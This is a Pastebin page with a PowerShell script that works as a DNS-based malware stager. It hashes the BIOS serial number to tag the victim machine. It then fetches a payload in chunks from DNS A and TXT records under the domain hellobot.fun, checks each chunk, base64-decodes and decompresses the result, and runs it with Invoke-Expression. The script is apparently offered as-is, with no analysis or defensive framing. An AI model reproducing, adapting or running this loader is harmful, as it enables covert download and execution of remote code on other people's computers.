Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- function Pick-Domain {
- Param($DomainList)
- if ($DomainList.count -eq 1) {
- return $DomainList
- }
- return $DomainList[(Get-Random -Maximum ([array]$DomainList).count)]
- }
- function Identify-Machine() {
- $serial = Get-WmiObject Win32_BIOS | Select -ExpandProperty SerialNumber
- $md5 = new-object -TypeName System.Security.Cryptography.MD5CryptoServiceProvider
- $hash = ($md5.ComputeHash([system.Text.Encoding]::UTF8.GetBytes($serial)) | foreach { $_.ToString("X2") }) -join ""
- return $hash.Substring(0, 10)
- }
- function Try-Domains {
- [CmdletBinding()]
- param([Parameter(ValueFromPipeline)]$DomainList, [Parameter()][scriptblock]$Action)
- if ($DomainList.count -eq 0) {
- Throw "No domains"
- }
- $domain = Pick-Domain($DomainList)
- try {
- return $Action.Invoke($domain)
- } catch {
- return Try-Domains ($DomainList | Where-Object { $_ βne $domain }) $Action
- }
- }
- function Do-DNS {
- [CmdletBinding()]
- param([Parameter()]$dns, [Parameter()]$type)
- Write-Debug "[DNS] (${type}) ==> ${dns}"
- # DEBUG DEBUG DEBUG
- #Write-Host $type
- try {
- $data = Resolve-DnsName -Type $type $dns -ErrorAction Stop -DnsOnly -Debug:$false
- return $data
- } catch {
- Write-Host $Error[0]
- }
- }
- function Do-DNS-TXT {
- [CmdletBinding()]
- param([Parameter()]$dns, [Parameter()]$type)
- return (Do-DNS $dns $type | Select -ExpandProperty Strings) -join ''
- }
- function Download-Stage {
- [CmdletBinding()]
- param([Parameter(ValueFromPipeline)]$DomainList)
- $stage = ''
- $domain = Pick-Domain $DomainList
- $partStage = 0
- $dns = "$(Identify-Machine).stage.$partStage.$domain"
- $dnsResponseA = Do-Dns $dns A | Select -ExpandProperty IPAddress
- while ($dnsResponseA -ne '0.0.0.0') {
- $bigInt = Ip-To-Long $dnsResponseA
- $bin = To-Bin-Number $bigInt
- $dnsResponseTXT = (Do-DNS $dns TXT | Select -ExpandProperty Strings) -join ''
- $md5 = new-object -TypeName System.Security.Cryptography.MD5CryptoServiceProvider
- $hash = ($md5.ComputeHash([system.Text.Encoding]::UTF8.GetBytes($dnsResponseTXT)) | foreach { $_.ToString("X2") }) -join ""
- $txtHex = [string]$hash[0] + [string]$hash[1] + [string]$hash[2] + [string]$hash[3] + [string]$hash[4] + [string]$hash[5] + [string]$hash[6] + [string]$hash[7]
- $txtInt = Hex-To-Int $txtHex
- $txtBin = To-Bin-Number $txtInt
- if ([string]$bin -eq [string]$txtBin) {
- $stage += $dnsResponseTXT
- $domain = Pick-Domain $DomainList
- $partStage++
- }
- $dns = "$(Identify-Machine).stage.$partStage.$domain"
- $dnsResponseA = Do-Dns $dns A | Select -ExpandProperty IPAddress
- }
- return [string]$stage
- }
- function Hex-To-Int{
- [CmdletBinding()]
- param([Parameter(ValueFromPipeline)]$Hex)
- $length = "$Hex".Length
- $mainLength = $length
- [bigint]$decimal = 0
- while ($length -ne 0) {
- $length--
- $liter = [string]$Hex[$length]
- if ($liter -eq "A"){
- $liter = 10
- }
- if ($liter -eq "B"){
- $liter = 11
- }
- if ($liter -eq "C"){
- $liter = 12
- }
- if ($liter -eq "D"){
- $liter = 13
- }
- if ($liter -eq "E"){
- $liter = 14
- }
- if ($liter -eq "F"){
- $liter = 15
- }
- $liter = [int]$liter
- $power = power 16 ($mainLength - $length - 1)
- $decimal += [bigint]($liter * $power)
- }
- return $decimal
- }
- function power{
- [CmdletBinding()]
- param([Parameter(ValueFromPipeline)]$num1, [Parameter(ValueFromPipeline)]$num2)
- return [Math]::Pow($num1, $num2)
- }
- function To-Bin-Number{
- [CmdletBinding()]
- param([Parameter(ValueFromPipeline)]$Number)
- $tmp = ''
- $binNumber_ = ''
- $myNumber = $Number
- DO {
- $tmp = $myNumber % 2
- $binNumber = [string]$tmp + [string]$binNumber
- $myNumber = [bigint]($myNumber / 2)
- } WHILE ($myNumber -ne 0)
- return $binNumber
- }
- function Ip-To-Long {
- [CmdletBinding()]
- param([Parameter(ValueFromPipeline)]$ip)
- $ipParts = "$ip".Split(".")
- $a = [bigint]([int]$ipParts[0] * 16777216)
- $b = [bigint]([int]$ipParts[1] * 65536)
- $c = [bigint]([int]$ipParts[2] * 256)
- $d = $ipParts[3]
- $base10IP = $a + $b + $c + $d
- return $base10IP
- }
- function Long-To-Ip{
- [CmdletBinding()]
- param([Parameter(ValueFromPipeline)]$long)
- $a = [bigint]([bigint]$long / 16777216) % 256
- $b = [bigint]([bigint]$long / 65536) % 256
- $c = [bigint]([bigint]$long / 256) % 256
- $d = [bigint]([bigint]$long) % 256
- return [string]$a + '.' + [string]$b + '.' + [string]$c + '.' + [string]$d
- }
- function Decode-String {
- [CmdletBinding()]
- param([Parameter(ValueFromPipeline)]$Code)
- $gzipBytes = [System.Convert]::FromBase64String($Code)
- $codeBytes = Get-DecompressedByteArray($gzipBytes)
- return [system.Text.Encoding]::UTF8.GetString($codeBytes)
- }
- # =============================================================================
- function Get-DecompressedByteArray {
- [CmdletBinding()]
- Param (
- [Parameter(Mandatory,ValueFromPipeline,ValueFromPipelineByPropertyName)]
- [byte[]] $byteArray = $(Throw("-byteArray is required"))
- )
- Process {
- Write-Verbose "Get-DecompressedByteArray"
- $input = New-Object System.IO.MemoryStream( , $byteArray )
- $output = New-Object System.IO.MemoryStream
- $gzipStream = New-Object System.IO.Compression.GzipStream $input, ([IO.Compression.CompressionMode]::Decompress)
- $gzipStream.CopyTo( $output )
- $gzipStream.Close()
- $input.Close()
- [byte[]] $byteOutArray = $output.ToArray()
- Write-Output $byteOutArray
- }
- }
- # =============================================================================
- $domains = @("hellobot.fun")
- try {
- $stage = Download-Stage($domains) | Decode-String
- Invoke-Expression $stage
- } catch {
- Write-Debug "[Main] General failure"
- Write-Host $Error[0]
- # do nothing
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement